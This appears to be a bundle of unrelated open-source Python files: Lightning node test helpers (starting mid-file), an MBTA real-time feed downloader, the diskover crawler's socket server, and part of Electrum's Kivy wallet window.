self.daemon.wait_for_logs([r'update for channel {}\(0\) now ACTIVE'
.format(scid),
r'update for channel {}\(1\) now ACTIVE'
.format(scid),
'to CHANNELD_NORMAL'])
l2.daemon.wait_for_logs([r'update for channel {}\(0\) now ACTIVE'
.format(scid),
r'update for channel {}\(1\) now ACTIVE'
.format(scid),
'to CHANNELD_NORMAL'])
return scid
def subd_pid(self, subd):
"""Get the process id of the given subdaemon, eg channeld or gossipd"""
ex = re.compile(r'lightning_{}.*: pid ([0-9]*),'.format(subd))
# Make sure we get latest one if it's restarted!
for l in reversed(self.daemon.logs):
group = ex.search(l)
if group:
return group.group(1)
raise ValueError("No daemon {} found".format(subd))
def channel_state(self, other):
"""Return the state of the channel to the other node.
Returns None if there is no such peer, or a channel hasn't been funded
yet.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['state']
def get_channel_scid(self, other):
"""Get the short_channel_id for the channel to the other node.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['short_channel_id']
def is_channel_active(self, chanid):
channels = self.rpc.listchannels()['channels']
active = [(c['short_channel_id'], c['channel_flags']) for c in channels if c['active']]
return (chanid, 0) in active and (chanid, 1) in active
def wait_for_channel_onchain(self, peerid):
txid = only_one(only_one(self.rpc.listpeers(peerid)['peers'])['channels'])['scratch_txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
def wait_channel_active(self, chanid):
wait_for(lambda: self.is_channel_active(chanid))
# This waits until gossipd sees channel_update in both directions
# (or for local channels, at least a local announcement)
def wait_for_routes(self, channel_ids):
# Could happen in any order...
self.daemon.wait_for_logs(['Received channel_update for channel {}\\(0\\)'.format(c)
for c in channel_ids]
+ ['Received channel_update for channel {}\\(1\\)'.format(c)
for c in channel_ids])
def pay(self, dst, amt, label=None):
if not label:
label = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(20))
rhash = dst.rpc.invoice(amt, label, label)['payment_hash']
invoices = dst.rpc.listinvoices(label)['invoices']
assert len(invoices) == 1 and invoices[0]['status'] == 'unpaid'
routestep = {
'msatoshi': amt,
'id': dst.info['id'],
'delay': 5,
'channel': '1:1:1'
}
def wait_pay():
# Up to 10 seconds for payment to succeed.
start_time = time.time()
while dst.rpc.listinvoices(label)['invoices'][0]['status'] != 'paid':
if time.time() > start_time + 10:
raise TimeoutError('Payment timed out')
time.sleep(0.1)
# sendpay is async now
self.rpc.sendpay([routestep], rhash)
# wait for sendpay to comply
self.rpc.waitsendpay(rhash)
# Note: this feeds through the smoother in update_feerate, so changing
# it on a running daemon may not give expected result!
def set_feerates(self, feerates, wait_for_effect=True):
# (bitcoind returns bitcoin per kb, so these are * 4)
def mock_estimatesmartfee(r):
params = r['params']
if params == [2, 'CONSERVATIVE']:
feerate = feerates[0] * 4
elif params == [4, 'ECONOMICAL']:
feerate = feerates[1] * 4
elif params == [100, 'ECONOMICAL']:
feerate = feerates[2] * 4
else:
raise ValueError()
return {
'id': r['id'],
'error': None,
'result': {
'feerate': Decimal(feerate) / 10**8
},
}
self.daemon.rpcproxy.mock_rpc('estimatesmartfee', mock_estimatesmartfee)
# Technically, this waits until it's called, not until it's processed.
# We wait until all three levels have been called.
if wait_for_effect:
wait_for(lambda: self.daemon.rpcproxy.mock_counts['estimatesmartfee'] >= 3)
def wait_for_onchaind_broadcast(self, name, resolve=None):
"""Wait for onchaind to drop tx name to resolve (if any)"""
if resolve:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve {}'
.format(name, resolve))
else:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve '
.format(name))
rawtx = re.search(r'.* \(([0-9a-fA-F]*)\) ', r).group(1)
txid = self.bitcoin.rpc.decoderawtransaction(rawtx, True)['txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
class NodeFactory(object):
"""A factory to setup and start `lightningd` daemons.
"""
def __init__(self, testname, bitcoind, executor, directory):
self.testname = testname
self.next_id = 1
self.nodes = []
self.executor = executor
self.bitcoind = bitcoind
self.directory = directory
self.lock = threading.Lock()
def split_options(self, opts):
"""Split node options from cli options
Some options are used to instrument the node wrapper and some are passed
to the daemon on the command line. Split them so we know where to use
them.
"""
node_opt_keys = [
'disconnect',
'may_fail',
'may_reconnect',
'random_hsm',
'log_all_io',
]
node_opts = {k: v for k, v in opts.items() if k in node_opt_keys}
cli_opts = {k: v for k, v in opts.items() if k not in node_opt_keys}
return node_opts, cli_opts
def get_next_port(self):
with self.lock:
return reserve()
def get_nodes(self, num_nodes, opts=None):
"""Start a number of nodes in parallel, each with its own options
"""
if opts is None:
# No opts were passed in, give some dummy opts
opts = [{} for _ in range(num_nodes)]
elif isinstance(opts, dict):
# A single dict was passed in, so we use these opts for all nodes
opts = [opts] * num_nodes
assert len(opts) == num_nodes
jobs = []
for i in range(num_nodes):
node_opts, cli_opts = self.split_options(opts[i])
jobs.append(self.executor.submit(self.get_node, options=cli_opts, **node_opts))
return [j.result() for j in jobs]
def get_node(self, disconnect=None, options=None, may_fail=False,
may_reconnect=False, random_hsm=False,
feerates=(15000, 7500, 3750), start=True, log_all_io=False):
with self.lock:
node_id = self.next_id
self.next_id += 1
port = self.get_next_port()
lightning_dir = os.path.join(
self.directory, "lightning-{}/".format(node_id))
if os.path.exists(lightning_dir):
shutil.rmtree(lightning_dir)
socket_path = os.path.join(lightning_dir, "lightning-rpc").format(node_id)
daemon = LightningD(
lightning_dir, self.bitcoind,
port=port, random_hsm=random_hsm, node_id=node_id
)
# If we have a disconnect string, dump it to a file for daemon.
if disconnect:
daemon.disconnect_file = os.path.join(lightning_dir, "dev_disconnect")
with open(daemon.disconnect_file, "w") as f:
f.write("\n".join(disconnect))
daemon.opts["dev-disconnect"] = "dev_disconnect"
if log_all_io:
assert DEVELOPER
daemon.env["LIGHTNINGD_DEV_LOG_IO"] = "1"
daemon.opts["log-level"] = "io"
if DEVELOPER:
daemon.opts["dev-fail-on-subdaemon-fail"] = None
daemon.env["LIGHTNINGD_DEV_MEMLEAK"] = "1"
if os.getenv("DEBUG_SUBD"):
daemon.opts["dev-debugger"] = os.getenv("DEBUG_SUBD")
if VALGRIND:
daemon.env["LIGHTNINGD_DEV_NO_BACKTRACE"] = "1"
if not may_reconnect:
daemon.opts["dev-no-reconnect"] = None
if options is not None:
daemon.opts.update(options)
rpc = LightningRpc(socket_path, self.executor)
node = LightningNode(daemon, rpc, self.bitcoind, self.executor, may_fail=may_fail,
may_reconnect=may_reconnect)
# Regtest estimatefee are unusable, so override.
node.set_feerates(feerates, False)
self.nodes.append(node)
if VALGRIND:
node.daemon.cmd_prefix = [
'valgrind',
'-q',
'--trace-children=yes',
'--trace-children-skip=*bitcoin-cli*',
'--error-exitcode=7',
'--log-file={}/valgrind-errors.%p'.format(node.daemon.lightning_dir)
]
if start:
try:
node.start()
except Exception:
node.daemon.stop()
raise
return node
def line_graph(self, num_nodes, fundchannel=True, fundamount=10**6, announce=False, opts=None):
""" Create nodes, connect them and optionally fund channels.
"""
nodes = self.get_nodes(num_nodes, opts=opts)
bitcoin = nodes[0].bitcoin
connections = [(nodes[i], nodes[i + 1]) for i in range(0, num_nodes - 1)]
for src, dst in connections:
src.rpc.connect(dst.info['id'], 'localhost', dst.port)
# If we're returning now, make sure dst all show connections in
# getpeers.
if not fundchannel:
for src, dst in connections:
dst.daemon.wait_for_log('openingd-{} chan #[0-9]*: Handed peer, entering loop'.format(src.info['id']))
return nodes
# If we got here, we want to fund channels
for src, dst in connections:
addr = src.rpc.newaddr()['address']
src.bitcoin.rpc.sendtoaddress(addr, (fundamount + 1000000) / 10**8)
bitcoin.generate_block(1)
for src, dst in connections:
wait_for(lambda: len(src.rpc.listfunds()['outputs']) > 0)
tx = src.rpc.fundchannel(dst.info['id'], fundamount)
wait_for(lambda: tx['txid'] in bitcoin.rpc.getrawmempool())
# Confirm all channels and wait for them to become usable
bitcoin.generate_block(1)
scids = []
for src, dst in connections:
wait_for(lambda: src.channel_state(dst) == 'CHANNELD_NORMAL')
scid = src.get_channel_scid(dst)
src.daemon.wait_for_log(r'Received channel_update for channel {scid}\(.\) now ACTIVE'.format(scid=scid))
scids.append(scid)
if not announce:
return nodes
bitcoin.generate_block(5)
def both_dirs_ready(n, scid):
resp = n.rpc.listchannels(scid)
return [a['active'] for a in resp['channels']] == [True, True]
# Make sure everyone sees all channels: we can cheat and
# simply check the ends (since it's a line).
wait_for(lambda: both_dirs_ready(nodes[0], scids[-1]))
wait_for(lambda: both_dirs_ready(nodes[-1], scids[0]))
# Make sure we have all node announcements, too (just check ends)
for n in nodes:
for end in (nodes[0], nodes[-1]):
wait_for(lambda: 'alias' in only_one(end.rpc.listnodes(n.info['id'])['nodes']))
return nodes
def killall(self, expected_successes):
"""Returns true if every node we expected to succeed actually succeeded"""
unexpected_fail = False
for i in range(len(self.nodes)):
leaks = None
# leak detection upsets VALGRIND by reading uninitialized mem.
# If it's dead, we'll catch it below.
if not VALGRIND:
try:
# This also puts leaks in log.
leaks = self.nodes[i].rpc.dev_memleak()['leaks']
except Exception:
pass
try:
self.nodes[i].stop()
except Exception:
if expected_successes[i]:
unexpected_fail = True
if leaks is not None and len(leaks) != 0:
raise Exception("Node {} has memory leaks: {}"
.format(self.nodes[i].daemon.lightning_dir, leaks))
return not unexpected_fail
|
download_mbta_gtfsrt.py
|
"""Script to download MBTA vehicle positions every 5 seconds
during 1 minute
"""
import os
import time
import threading
from datetime import datetime
import traceback
import requests
from common import Settings, s3, utils
__author__ = "Alex Ganin"
def download_feed(dirName, url, *args):
"""Downloads a real-time vehicle positions file to the local storage
and then uploads it to S3 and removes from the local storage
Args:
dirName: the local directory where the file will be saved initially
url: the URL to download the file from
*args: placeholder for any additional arguments, unused
"""
fName = datetime.now().strftime("%Y%m%d-%H%M%S.pb")
r = requests.get(url)
fPath = os.path.join(Settings.ProjPath, "pb", dirName, fName)
with open(fPath, "wb") as handle:
handle.write(r.content)
try:
# always use '/' as path separator in S3
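# replacing '-' with '/' turns "YYYYMMDD-HHMMSS.pb" into a date-based prefix,
# e.g. "pb/VehiclePos/20190101/123456.pb"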
objKey = '/'.join(["pb", dirName, fName.replace('-', '/')])
s3Mgr = s3.S3Mgr()
s3Mgr.upload_file(fPath, objKey)
os.remove(fPath)
except Exception: # pylint: disable=broad-except
log = utils.get_logger()
log.warning("Error while saving the file %s to S3 and/or DB", fPath)
log.warning(traceback.format_exc())
pass # do not interfere with other threads that might succeed
def main():
"""Downloads the vehicle positions feed from MBTA
12 times over 1 minute by starting a new download thread every 5 seconds
"""
Feeds = [
("VehiclePos", "https://cdn.mbta.com/realtime/VehiclePositions.pb", 5)
]
for feedTpl in Feeds:
p = os.path.join(Settings.ProjPath, "pb", feedTpl[0])
if not os.path.exists(p):
os.makedirs(p)
threads = []
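# start a download thread every 5 seconds; the loop covers seconds 0..55, and
# the break at sec == 55 skips the final sleep so the run stays within one minute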
for sec in range(0, 59, 5):
for feedTpl in Feeds:
if sec % feedTpl[2] != 0:
continue
t = threading.Thread(target=download_feed, args=feedTpl)
t.start()
threads.append(t)
if sec == 55:
break
time.sleep(5)
for t in threads:
t.join()
if __name__ == "__main__":
main()
|
diskover_socket_server.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""diskover - Elasticsearch file system crawler
diskover is a file system crawler that indexes
your file metadata into Elasticsearch.
See README.md or https://github.com/shirosaidev/diskover
for more information.
Copyright (C) Chris Park 2017-2018
diskover is released under the Apache 2.0 license. See
LICENSE for the full license text.
"""
from diskover import q_crawl, adaptive_batch, config, get_time
from diskover_bot_module import scrape_tree_meta
import socket
import subprocess
try:
import queue as Queue
except ImportError:
import Queue
import threading
import uuid
import json
import time
import sys
import pickle
import struct
# dict to hold socket tasks
socket_tasks = {}
# list of socket clients
clientlist = []
def socket_thread_handler(threadnum, q, cliargs, logger):
"""This is the socket thread handler function.
It runs the command msg sent from client.
"""
BUFF = 1024
while True:
try:
c = q.get()
clientsock, addr = c
logger.debug(clientsock)
logger.debug(addr)
data = clientsock.recv(BUFF)
data = data.decode('utf-8')
logger.debug('received data: %s' % data)
if not data:
q.task_done()
# close connection to client
clientsock.close()
logger.info("[thread-%s]: %s closed connection" % (threadnum, str(addr)))
continue
# check if ping msg
if data == 'ping':
logger.info("[thread-%s]: Got ping from %s" % (threadnum, str(addr)))
# send pong reply
message = b'pong'
clientsock.send(message)
logger.debug('sending data: %s' % message)
else:
# strip away any headers sent by curl
data = data.split('\r\n')[-1]
logger.info("[thread-%s]: Got command from %s" % (threadnum, str(addr)))
# load json and store in dict
command_dict = json.loads(data)
logger.debug(command_dict)
# run command from json data
run_command(threadnum, command_dict, clientsock, cliargs, logger)
q.task_done()
# close connection to client
clientsock.close()
logger.info("[thread-%s]: %s closed connection" % (threadnum, str(addr)))
except (ValueError, TypeError) as e:
q.task_done()
logger.error("[thread-%s]: Invalid JSON from %s: (%s)" % (threadnum, str(addr), e))
message = b'{"msg": "error", "error": "Invalid JSON caused by %s"}\n' % str(e).encode('utf-8')
clientsock.send(message)
logger.debug(message)
# close connection to client
clientsock.close()
logger.info("[thread-%s]: %s closed connection" % (threadnum, str(addr)))
pass
except socket.error as e:
q.task_done()
logger.error("[thread-%s]: Socket error (%s)" % (threadnum, e))
# close connection to client
clientsock.close()
logger.info("[thread-%s]: %s closed connection" % (threadnum, str(addr)))
pass
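# Helpers for the tree walk client wire protocol: each message is framed as a
# 4-byte big-endian length prefix (struct '!I') followed by that many bytes of
# pickled payload.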
def recvall(sock, count):
buf = b''
while count:
newbuf = sock.recv(count)
if not newbuf: return None
buf += newbuf
count -= len(newbuf)
return buf
def recv_one_message(sock):
lengthbuf = recvall(sock, 4)
if not lengthbuf:
return None
length, = struct.unpack('!I', lengthbuf)
return recvall(sock, length)
def socket_thread_handler_twc(threadnum, q, q_kill, lock, rootdir, num_sep, level,
batchsize, cliargs, logger, reindex_dict):
"""This is the socket thread handler tree walk client function.
Streams of directory listings (pickled) from diskover tree walk
client connections are enqueued to the Redis RQ queue.
"""
while True:
try:
c = q.get()
clientsock, addr = c
logger.debug(clientsock)
logger.debug(addr)
totalfiles = 0
while True:
data = recv_one_message(clientsock)
if not data:
break
if data == b'SIGKILL' or data == 'SIGKILL':
q_kill.put(b'SIGKILL')
break
# unpickle data sent from client
data_decoded = pickle.loads(data)
logger.debug(data_decoded)
# enqueue to redis
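# accumulate (root, dirs, files) tuples until the batch size (or the adaptive
# max file count) is reached, then enqueue one scrape_tree_meta job per batch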
batch = []
for root, dirs, files in data_decoded:
files_len = len(files)
totalfiles += files_len
# check for empty dirs
if len(dirs) == 0 and len(files) == 0 and not cliargs['indexemptydirs']:
continue
batch.append((root, dirs, files))
batch_len = len(batch)
if batch_len >= batchsize or (cliargs['adaptivebatch'] and totalfiles >= config['adaptivebatch_maxfiles']):
q_crawl.enqueue(scrape_tree_meta, args=(batch, cliargs, reindex_dict,),
result_ttl=config['redis_ttl'])
if cliargs['debug'] or cliargs['verbose']:
logger.info("enqueued batchsize: %s (batchsize: %s)" % (batch_len, batchsize))
del batch[:]
totalfiles = 0
if cliargs['adaptivebatch']:
batchsize = adaptive_batch(q_crawl, cliargs, batchsize)
if cliargs['debug'] or cliargs['verbose']:
logger.info("batchsize set to: %s" % batchsize)
if len(batch) > 0:
# add any remaining in batch to queue
q_crawl.enqueue(scrape_tree_meta, args=(batch, cliargs, reindex_dict,), result_ttl=config['redis_ttl'])
del batch[:]
# close connection to client
clientsock.close()
logger.info("[thread-%s]: %s closed connection" % (threadnum, str(addr)))
q.task_done()
except socket.error as e:
logger.error("[thread-%s]: Socket error (%s)" % (threadnum, e))
def start_socket_server(cliargs, logger):
"""This is the start socket server function.
It opens a socket and waits for remote commands.
"""
global clientlist
# set thread/connection limit
max_connections = config['listener_maxconnections']
# Queue for socket threads
q = Queue.Queue(maxsize=max_connections)
try:
# create TCP socket object
serversock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
host = config['listener_host'] # default is localhost
port = config['listener_port'] # default is 9999
# bind to port
serversock.bind((host, port))
# start listener
serversock.listen(max_connections)
# set up the threads and start them
for i in range(max_connections):
# create thread
t = threading.Thread(target=socket_thread_handler, args=(i, q, cliargs, logger,))
t.daemon = True
t.start()
while True:
logger.info("Waiting for connection, listening on %s port %s TCP (ctrl-c to shutdown)"
% (str(host), str(port)))
# establish connection
clientsock, addr = serversock.accept()
logger.debug(clientsock)
logger.debug(addr)
logger.info("Got a connection from %s" % str(addr))
# add client to list
client = (clientsock, addr)
clientlist.append(client)
# add task to Queue
q.put(client)
except socket.error as e:
serversock.close()
logger.error("Error opening socket (%s)" % e)
sys.exit(1)
except KeyboardInterrupt:
print('\nCtrl-c keyboard interrupt received, shutting down...')
q.join()
serversock.close()
sys.exit(0)
def start_socket_server_twc(rootdir_path, num_sep, level, batchsize, cliargs, logger, reindex_dict):
"""This is the start socket server tree walk function.
It opens a socket and waits for diskover tree walk client
connections.
"""
global clientlist
# set thread/connection limit
max_connections = config['listener_maxconnections']
# Queue for socket threads
q = Queue.Queue(maxsize=max_connections)
q_kill = Queue.Queue()
lock = threading.Lock()
try:
# create TCP socket object
serversock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
host = config['listener_host'] # default is localhost
if cliargs['twcport']:
port = cliargs['twcport']
else:
port = config['listener_twcport'] # default is 9998
# bind to port
serversock.bind((host, port))
# start listener
serversock.listen(max_connections)
# set up the threads and start them
for i in range(max_connections):
t = threading.Thread(
target=socket_thread_handler_twc,
args=(i, q, q_kill, lock, rootdir_path, num_sep,
level, batchsize, cliargs, logger, reindex_dict,))
t.daemon = True
t.start()
starttime = time.time()
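# main accept loop; worker threads signal shutdown by putting SIGKILL onto
# q_kill when a tree walk client sends it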
while True:
if q_kill.qsize() > 0:
logger.info("Received signal to shutdown socket server")
q.join()
serversock.close()
return starttime
logger.info("Waiting for connection, listening on %s port %s TCP (ctrl-c to shutdown)"
% (str(host), str(port)))
# establish connection
clientsock, addr = serversock.accept()
logger.debug(clientsock)
logger.debug(addr)
logger.info("Got a connection from %s" % str(addr))
# add client to list
client = (clientsock, addr)
clientlist.append(client)
# set start time to first connection
if len(clientlist) == 1:
starttime = time.time()
# put client into Queue
q.put(client)
except socket.error as e:
serversock.close()
logger.error("Error opening socket (%s)" % e)
sys.exit(1)
except KeyboardInterrupt:
print('\nCtrl-c keyboard interrupt received, shutting down...')
serversock.close()
sys.exit(0)
def run_command(threadnum, command_dict, clientsock, cliargs, logger):
"""This is the run command function.
It runs commands from the listener socket
using values in command_dict.
"""
global socket_tasks
global clientlist
# try to get index name from command or use from diskover config file
try:
index = str(command_dict['index'])
except KeyError:
index = str(config['index'])
pass
# try to get worker batch size from command or use default
try:
batchsize = str(command_dict['batchsize'])
except KeyError:
batchsize = str(cliargs['batchsize'])
pass
# try to get adaptive batch option from command or use default
try:
adaptivebatch = str(command_dict['adaptivebatch'])
except KeyError:
adaptivebatch = str(cliargs['adaptivebatch'])
pass
try:
action = command_dict['action']
pythonpath = config['python_path']
diskoverpath = config['diskover_path']
# set up command for different action
if action == 'crawl':
path = command_dict['path']
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '-d', path, '-q', '-F']
elif action == 'finddupes':
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '--finddupes', '-q', '-F']
elif action == 'hotdirs':
index2 = str(command_dict['index2'])
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '--hotdirs', index2, '-q', '-F']
elif action == 'reindex':
try:
recursive = command_dict['recursive']
except KeyError:
recursive = 'false'
pass
path = command_dict['path']
if recursive == 'true':
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '-d', path, '-R', '-q', '-F']
else:
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '-d', path, '-r', '-q', '-F']
elif action == 'updatedirsizes':
try:
recursive = command_dict['recursive']
except KeyError:
recursive = 'false'
pass
if recursive == 'true':
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '--dircalcsonly', '-q', '-F']
else:
path = command_dict['path']
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '-d', path, '--dircalcsonly', '--maxdcdepth', '0', '-q', '-F']
elif action == 'kill':
taskid = command_dict['taskid']
logger.info("[thread-%s]: Kill task message received! (taskid:%s)",
threadnum, taskid)
# do something here to kill task (future)
message = b'{"msg": "taskkilled"}\n'
clientsock.send(message)
return
else:
logger.warning("Unknown action")
message = b'{"error": "unknown action"}\n'
clientsock.send(message)
return
# add adaptive batch
if (adaptivebatch == "True" or adaptivebatch == "true"):
cmd.append('-a')
# run command using subprocess
starttime = time.time()
taskid = str(uuid.uuid4()).encode('utf-8')
# start process
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# add process to socket_tasks dict
socket_tasks[taskid] = process
message = b'{"msg": "taskstart", "taskid": "' + taskid + b'"}\n'
clientsock.send(message)
logger.info("[thread-%s]: Running command (taskid:%s)",
threadnum, taskid.decode('utf-8'))
logger.info(cmd)
output, error = process.communicate()
# send exit msg to client
exitcode = str(process.returncode).encode('utf-8')
logger.debug('Command output:')
logger.debug(output.decode('utf-8'))
logger.debug('Command error:')
logger.debug(error.decode('utf-8'))
elapsedtime = str(get_time(time.time() - starttime)).encode('utf-8')
logger.info("Finished command (taskid:%s), exit code: %s, elapsed time: %s"
% (taskid.decode('utf-8'), exitcode.decode('utf-8'), elapsedtime.decode('utf-8')))
message = b'{"msg": "taskfinish", "taskid": "%s", "exitcode": %s, "elapsedtime": "%s"}\n' \
% (taskid, exitcode, elapsedtime)
clientsock.send(message)
except ValueError:
logger.warning("Value error")
message = b'{"error": "value error"}\n'
clientsock.send(message)
pass
except socket.error as e:
logger.error("[thread-%s]: Socket error (%s)" % (threadnum, e))
pass
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from typing import TYPE_CHECKING, Optional, Union, Callable, Sequence
from electrum.storage import WalletStorage, StorageReadWriteError
from electrum.wallet_db import WalletDB
from electrum.wallet import Wallet, InternalAddressCorruption, Abstract_Wallet
from electrum.wallet import update_password_for_directory
from electrum.plugin import run_hook
from electrum import util
from electrum.util import (profiler, InvalidPassword, send_exception_to_crash_reporter,
format_satoshis, format_satoshis_plain, format_fee_satoshis,
maybe_extract_bolt11_invoice)
from electrum.invoices import PR_PAID, PR_FAILED
from electrum import blockchain
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.interface import PREFERRED_NETWORK_PROTOCOL, ServerAddr
from electrum.logging import Logger
from electrum.gui import messages
from .i18n import _
from . import KIVY_GUI_PATH
from kivy.app import App
from kivy.core.window import Window
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
from .uix.dialogs.password_dialog import OpenWalletDialog, ChangePasswordDialog, PincodeDialog, PasswordDialog
from .uix.dialogs.choice_dialog import ChoiceDialog
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
from .uix.dialogs.question import Question
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
# register widget cache to keep memory use down; set timeout to forever (0)
# so the cached data is never evicted
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum.gui.kivy.uix.screens')
# Register fonts; without this you won't be able to use bold/italic
# inside markup.
from kivy.core.text import Label
Label.register(
'Roboto',
KIVY_GUI_PATH + '/data/fonts/Roboto.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto-Bold.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto-Bold.ttf',
)
from electrum.util import (NoDynamicFeeEstimates, NotEnoughFunds,
BITCOIN_BIP21_URI_SCHEME, LIGHTNING_URI_SCHEME,
UserFacingException)
from .uix.dialogs.lightning_open_channel import LightningOpenChannelDialog
from .uix.dialogs.lightning_channels import LightningChannelsDialog, SwapDialog
if TYPE_CHECKING:
from . import ElectrumGui
from electrum.simple_config import SimpleConfig
from electrum.plugin import Plugins
from electrum.paymentrequest import PaymentRequest
class ElectrumWindow(App, Logger):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
lightning_gossip_num_peers = NumericProperty(0)
lightning_gossip_num_nodes = NumericProperty(0)
lightning_gossip_num_channels = NumericProperty(0)
lightning_gossip_num_queries = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
protocol = PREFERRED_NETWORK_PROTOCOL
def cb2(server_str):
popup.ids.server_str.text = server_str
servers = self.network.get_servers()
server_choices = {}
for _host, d in sorted(servers.items()):
port = d.get(protocol)
if port:
server = ServerAddr(_host, port, protocol=protocol)
server_choices[server.net_addr_str()] = _host
ChoiceDialog(_('Choose a server'), server_choices, popup.ids.server_str.text, cb2).open()
def maybe_switch_to_server(self, server_str: str):
net_params = self.network.get_parameters()
try:
server = ServerAddr.from_str_with_inference(server_str)
if not server: raise Exception("failed to parse")
except Exception as e:
self.show_error(_("Invalid server details: {}").format(repr(e)))
return
net_params = net_params._replace(server=server)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def choose_blockchain_dialog(self, dt):
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_gossip = BooleanProperty(False)
def on_use_gossip(self, instance, x):
self.electrum_config.set_key('use_gossip', self.use_gossip, True)
if self.network:
if self.use_gossip:
self.network.start_gossip()
else:
self.network.run_from_another_thread(
self.network.stop_gossip())
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
if self.wallet:
self.wallet.use_change = self.use_change
self.wallet.db.put('use_change', self.use_change)
self.wallet.save_db()
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
use_recoverable_channels = BooleanProperty(True)
def on_use_recoverable_channels(self, instance, x):
self.electrum_config.set_key('use_recoverable_channels', self.use_recoverable_channels, True)
def switch_to_send_screen(func):
# try until send_screen is available
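# Clock.schedule_interval keeps calling the lambda while it returns True:
# wait for a wallet, switch to the send tab if needed, and once send_screen
# exists call func and return False to stop the retries.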
def wrapper(self, *args):
f = lambda dt: (bool(func(self, *args) and False) if self.send_screen else bool(self.switch_to('send') or True)) if self.wallet else True
Clock.schedule_interval(f, 0.1)
return wrapper
@switch_to_send_screen
def set_URI(self, uri):
self.send_screen.set_URI(uri)
@switch_to_send_screen
def set_ln_invoice(self, invoice):
self.send_screen.set_ln_invoice(invoice)
def on_new_intent(self, intent):
data = str(intent.getDataString())
scheme = str(intent.getScheme()).lower()
if scheme == BITCOIN_BIP21_URI_SCHEME:
self.set_URI(data)
elif scheme == LIGHTNING_URI_SCHEME:
self.set_ln_invoice(data)
def on_language(self, instance, language):
self.logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
self.logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
self.logger.info("on_history")
if self.wallet:
